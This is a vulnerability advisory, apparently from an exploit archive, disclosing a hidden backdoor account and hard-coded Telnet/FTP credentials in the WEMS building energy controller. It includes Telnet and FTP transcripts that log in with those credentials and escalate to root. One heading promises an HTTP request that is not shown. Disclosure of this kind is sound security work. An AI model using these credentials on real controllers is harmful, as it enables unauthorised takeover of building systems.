Exploits / Vulnerability Discovered : 2019-12-30 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Wems bems 21.3.1 undocumented backdoor account is for educational purposes only and if it is used you will do on your own risk!
Summary: We (WEMS) offer the world's first fully wireless energy management system.
Our solution enables your organization to take control of its energy costs, by monitoring
lighting, heating and air conditioning equipment to identify wastage across multiple
sites and start saving money instantly. Additionally, we offer a service which enables
you to personally control the settings of your building - remotely, via text messaging
and the internet - from wherever you happen to be in the world.
Desc: The wireless BMS solution has an undocumented backdoor account that is Base64-encoded.
These sets of credentials are never exposed to the end-user and cannot be changed through
any normal operation of the controller thru the RMI. Attacker could exploit this vulnerability
by logging in using the backdoor account with highest privileges for administration and gain
full system control. The check_users.sh Bash script is used to generate the default accounts
on the system with their passwords and privilege level. The backdoor user cannot be seen in
the users settings in the admin panel and it also uses an undocumented privilege level 3 when
using the addhttpuser program which allows full availability of the features that the WEMS
is offering remotely. WEMS also ships with hard-coded and weak credentials for Telnet/FTP
access using the credentials gast:glasshou or root:glasshou.
Tested on: Linux 2.6.16 armv5tejl
thttpd/2.25b
Adam 7000 System
WEMS OS 5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
# Verify user added successfully...
if [ "$?" -eq "255" ]
then
echo "Error when adding logging user credentials - aborting.."
cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
exit
fi
By calling the auth command through the cmd parameter, the cgiauth binary
reads the /mnt/etc/httpusers file and checks validation for authentication.
To login with the backdoor account the following HTTP GET request is made:
--------------------------------------------------------------------------
$ telnet 192.168.1.17
Connected to 192.168.1.17.
Escape character is '^]'.
- Adam 7000 System - Version 4.1a-usb -
WEMS login: gast
Password:
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
$ id
uid=500(gast) gid=500
$ su
Password:
BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id
uid=0(root) gid=0(root)
# netstat -nat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
-----------
$ ftp 192.168.1.17
WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready.
user root
331 Password required for root.
pass glasshou
230 User root logged in.